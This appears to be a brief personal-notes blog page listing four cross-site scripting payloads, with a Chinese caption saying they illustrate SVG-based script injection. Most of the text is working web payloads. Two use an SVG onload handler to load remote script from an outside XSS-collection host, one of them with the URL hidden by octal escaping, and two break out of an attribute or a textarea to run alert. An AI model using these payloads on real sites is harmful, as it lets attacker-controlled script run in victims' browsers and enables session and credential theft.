1.<svg/onload="s=createElement('script');body.appendChild(s);s.src='http://xss.fbisb.com/1TjI'";/>
2.
"onmouseover=alert""//
3.
</textarea><svg/onload=alert``>//
4.
<svg/onload="s=createElement('script');body.appendChild(s);s.src='\150\164\164\160\72\57\57\170\163\163\56\146\142\151\163\142\56\143\157\155\57\61\124\152\111'";/>
个人笔记,待更新
本文提供了一系列利用 SVG 进行恶意脚本注入的示例代码,包括 onload 事件触发的脚本执行等。这些示例有助于理解跨站脚本攻击(XSS)的工作原理。
5216

被折叠的 条评论
为什么被折叠?



